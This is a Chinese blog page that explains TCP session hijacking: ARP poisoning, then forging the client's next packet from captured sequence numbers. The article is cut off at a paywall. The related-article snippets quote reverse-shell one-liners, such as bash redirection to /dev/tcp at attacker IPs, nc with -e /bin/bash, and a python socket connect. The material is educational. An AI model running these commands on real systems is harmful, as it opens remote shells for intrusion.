TCP劫持及反弹shell攻击

最新推荐文章于 2024-05-09 14:38:44 发布
最新推荐文章于 2024-05-09 14:38:44 发布
阅读量1.1k 收藏 5
点赞数 4
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43997530/article/details/104973405
版权

TCP劫持攻击

攻击原理:

1、攻击者获取client与服务器的TCP会话包;利用ARP毒化或者MAC洪泛攻击。

2、观察服务器给client主机的TCP报文,获取client给server的下一个发送报文信息。

3、攻击者通过构造一个TCP的报文,该报文是client给server的下一个报文。具体参数如下:

       二层的源MAC为攻击者的;

       三层的源IP是client端的IP地址,目标IP是服务器的IP地址。

       四层的参数需要通过查看client与服务器的数据包来获取。

我们知道服务器只能通过三层与四层的信息来判断会话。

思路:用kali伪装client给服务器发送TCP的报文,夺取client与服务器的会话,之后冒充client获取服务器的信任。

前提是需要得知对方的数据包中的序列号,ACK的作用就是用来确认对端的数据我已经收到你的上一个数据包,我现在想要下一个;如果ACK不正确就会形成ACK风暴,通信双方会不停发送ACK来请求正确的数据包。

首先抓取通信双方的数据包,显示的序列号为经过计算的,在序列号中去掉该选项,显示出真实的序列号。

最低0.47元/天 解锁文章
嚴 帅
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹Shell原理与实现
m0_62451321的博客
11-14 3060
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5203
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
网络安全-反弹shell详解(攻击,检测与防御)_反弹shell原理及防御方法
最新发布
2401_84264491的博客
05-09 466
如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。
华中科技大学2024年网络空间安全学院TCP协议漏洞利用(SYN flood、RST、会话劫持(反向shell)实验)
qq_52342849的博客
04-07 1307
实验有3个docker容器,分别为user(作为初始连接,IP 172.17.0.2),server(作为服务器和被攻击对象,IP 172.17.0.3),user2(作为攻击成功后的验证连接,IP 172.17.0.4),虚拟机本身(作为攻击者,IP 172.17.0.1),其中虚拟机开启后默认开启所有的docker,server默认开启telnet服务,登录用户名root,密码123456,并且默认开启tcp syn cookies。虚拟机开机密码:123456,串行控制台登录用户名:ubuntu。
Laykefu客服系统 任意文件上传漏洞,2024年最新34岁程序员年薪50w
2401_83739632的博客
04-15 306
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。
完了!TCP出了大事!
xuanyuan_fsx的专栏
07-30 2636
前情回顾:《非中间人就不能劫持TCP了吗?》 不速之客 夜黑风高,乌云蔽月。 两位不速之客,身着黑衣,一高一矮,潜入Linux帝国。 这一潜就是一个多月,直到他们收到了一条消息······ 高个:“上峰终于给我们派任务了” 矮个:“什么任务?我都闲的发慌了” 高个:“上峰让我们配合他们完成TCP连接的劫持” 矮个:“TCP劫持?我们就是个普通程序,并没有内核权限,怎么去修改网络连接啊,这不是强人所难嘛” 高个:“是啊,我也很奇怪。信上只约定了让我们到时候告诉他们一个计数器的值就行,其他我们不用管” 矮个
Linux下NC反弹shell命令(推荐)
09-15
在网络安全和渗透测试中,反弹Shell是一种常见的技术,它允许攻击者远程控制受感染的系统。在Linux环境中,网络工具`nc`(Netcat)常被用来创建这种连接。本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作...
linux shell 脚本实现tcp/upd协议通讯(重定向应用)
09-15
主要介绍了linux shell 脚本实现tcp/upd协议通讯(重定向应用),需要的朋友可以参考下
TCP序列号攻击的原理及预防方法
02-18
TCP序列号攻击的原理及预防方法,对于TCP序列攻击有一定的参考价值
tcp远程模拟shell
06-08
tcp服务端,在服务端可进行shell操作,例如ls、top、kill等等,命令多线程运行,所以top不会阻塞,可以由ps kill杀掉,但是调用cd .. 之类的之类并不会改变pwd,需要曲线救国。程序中将调试函数重定向至tcp。可...
详解NC反弹shell的几种方法
01-08
最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell...
linux client网络,shell实现网络client方法
weixin_42393929的博客
05-11 320
需要把线上的access日志发送到另一个程序接收开始想着用python实现,虽然python也有实现类似tail -F的方式,但太麻烦,而且效率也有折扣偶然发现了shell可以实现网络client,并且只用几行代码就可以实现先上代码:trap "exec 8&-" 0file='/data/nginx/llogs/access.log'exec 8<>/dev/tcp/10.3...
Linux利用shell进行tcp通讯,Shell 脚本实现TCP/UDP协议通讯
weixin_29488835的博客
05-13 1291
UTF-8和GBK等中文字符编码格式介绍及相互转换我们有很多时候需要使用中文编码格式,比如gbk.gb2312等,但是因为主要针对中文编码设置,因此并不完全通用,这样一来就有了在各编码间相互转换的需求,比如和UTF8的转换.可是在我使用的过程中,却发 ...Linq 中 Distinct 方法扩展原文链接 http://www.cnblogs.com/A_ming/archive/2013/05/...
反弹shell的N种姿势
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 2491
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
各种反弹shell方式
m0_58606546的博客
11-17 2286
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
各种shell反弹方法
weixin_46626737的博客
05-16 2341
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
什么是反弹shell?如何使用反弹shell
10-30
2. 在目标主机上执行反弹 Shell 命令,例如:bash -i >& /dev/tcp/攻击者IP/4444 0>&1 3. 在攻击者主机上就可以通过 nc 连接到目标主机的 Shell,例如:nc 目标主机IP 4444 除了使用 nc 工具,还可以使用其他工具或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值